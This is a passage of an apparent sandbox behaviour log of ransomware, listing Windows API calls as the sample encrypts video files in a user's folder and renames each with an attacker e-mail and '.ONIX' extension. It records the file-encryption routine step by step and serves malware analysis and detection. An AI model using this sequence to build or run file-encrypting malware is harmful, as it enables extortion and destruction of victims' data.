VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.933] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x875f, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.933] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.933] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.933] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.933] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.934] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.934] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.934] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv", dwFileAttributes=0x80) returned 1 [0121.934] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv") returned 55 [0121.934] GetProcessHeap () returned 0x410000 [0121.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0121.934] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv" [0121.934] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.934] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=34655) returned 1 [0121.934] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x875f [0121.934] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.934] GetProcessHeap () returned 0x410000 [0121.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.934] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.936] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.937] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.938] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x875f) returned 0x4dcb68 [0121.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x875f) returned 0xf50048 [0121.940] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.940] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x875f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x875f, lpOverlapped=0x0) returned 1 [0121.942] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x875f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.942] CloseHandle (hObject=0x4c8) returned 1 [0121.943] GetProcessHeap () returned 0x410000 [0121.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.943] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuakjq_rvenrs.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuakjq_rvenrs.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.945] GetProcessHeap () returned 0x410000 [0121.945] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.945] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237a0010, ftCreationTime.dwHighDateTime=0x1d5d857, ftLastAccessTime.dwLowDateTime=0x3f699f90, ftLastAccessTime.dwHighDateTime=0x1d5e006, ftLastWriteTime.dwLowDateTime=0x3f699f90, ftLastWriteTime.dwHighDateTime=0x1d5e006, nFileSizeHigh=0x0, nFileSizeLow=0x4a6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOKe.swf", cAlternateFileName="")) returned 1 [0121.945] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xgoke.swf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.946] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.946] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4a6e, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.946] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.946] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.947] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.947] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.947] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.947] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.947] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf", dwFileAttributes=0x80) returned 1 [0121.947] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf") returned 47 [0121.947] GetProcessHeap () returned 0x410000 [0121.947] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xce) returned 0x477600 [0121.947] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf" [0121.947] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.947] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19054) returned 1 [0121.947] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4a6e [0121.947] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.947] GetProcessHeap () returned 0x410000 [0121.947] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.947] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.949] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.950] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.951] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.954] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a6e) returned 0x4dcb68 [0121.954] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a6e) returned 0x4e15e0 [0121.954] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.954] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x4a6e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x4a6e, lpOverlapped=0x0) returned 1 [0121.956] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4a6e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.956] CloseHandle (hObject=0x4c8) returned 1 [0121.956] GetProcessHeap () returned 0x410000 [0121.956] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.956] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xgoke.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xgOKe.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xgoke.swf.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.959] GetProcessHeap () returned 0x410000 [0121.959] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.959] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6454db0, ftCreationTime.dwHighDateTime=0x1d5da2e, ftLastAccessTime.dwLowDateTime=0xa9e3bed0, ftLastAccessTime.dwHighDateTime=0x1d5dc7f, ftLastWriteTime.dwLowDateTime=0xa9e3bed0, ftLastWriteTime.dwHighDateTime=0x1d5dc7f, nFileSizeHigh=0x0, nFileSizeLow=0x14e19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xtdaWSSPnIjl sxH-kwU.mp4", cAlternateFileName="XTDAWS~1.MP4")) returned 1 [0121.959] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xtdawsspnijl sxh-kwu.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.959] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.959] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14e19, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.959] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.959] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.960] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.960] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.960] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.960] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.960] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4", dwFileAttributes=0x80) returned 1 [0121.960] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4") returned 62 [0121.960] GetProcessHeap () returned 0x410000 [0121.960] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x44faf8 [0121.960] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4" [0121.960] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.960] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=85529) returned 1 [0121.960] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14e19 [0121.961] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.961] GetProcessHeap () returned 0x410000 [0121.961] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.961] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.961] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.962] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.963] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.964] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14e19) returned 0xf50048 [0121.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14e19) returned 0xf64e70 [0121.965] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.966] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x14e19, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x14e19, lpOverlapped=0x0) returned 1 [0121.969] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14e19, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.969] CloseHandle (hObject=0x4c8) returned 1 [0121.970] GetProcessHeap () returned 0x410000 [0121.970] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.970] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xtdawsspnijl sxh-kwu.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xtdaWSSPnIjl sxH-kwU.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xtdawsspnijl sxh-kwu.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.974] GetProcessHeap () returned 0x410000 [0121.974] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.974] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab72c0, ftCreationTime.dwHighDateTime=0x1d5dc5b, ftLastAccessTime.dwLowDateTime=0xb21c3040, ftLastAccessTime.dwHighDateTime=0x1d5df05, ftLastWriteTime.dwLowDateTime=0xb21c3040, ftLastWriteTime.dwHighDateTime=0x1d5df05, nFileSizeHigh=0x0, nFileSizeLow=0x173dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y94u3-Hg_FZ.flv", cAlternateFileName="Y94U3-~1.FLV")) returned 1 [0121.974] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\y94u3-hg_fz.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.974] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.974] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x173dc, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.974] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.974] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.975] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.975] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.975] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.975] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.975] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv", dwFileAttributes=0x80) returned 1 [0121.976] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv") returned 53 [0121.976] GetProcessHeap () returned 0x410000 [0121.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0121.976] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv" [0121.976] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.976] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=95196) returned 1 [0121.976] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x173dc [0121.976] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.976] GetProcessHeap () returned 0x410000 [0121.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.976] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.978] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.979] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.980] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.981] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x173dc) returned 0xf50048 [0121.982] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x173dc) returned 0xf67430 [0121.982] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.982] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x173dc, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x173dc, lpOverlapped=0x0) returned 1 [0121.986] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x173dc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.987] CloseHandle (hObject=0x4c8) returned 1 [0121.987] GetProcessHeap () returned 0x410000 [0121.987] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.987] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\y94u3-hg_fz.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\y94u3-Hg_FZ.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\y94u3-hg_fz.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.990] GetProcessHeap () returned 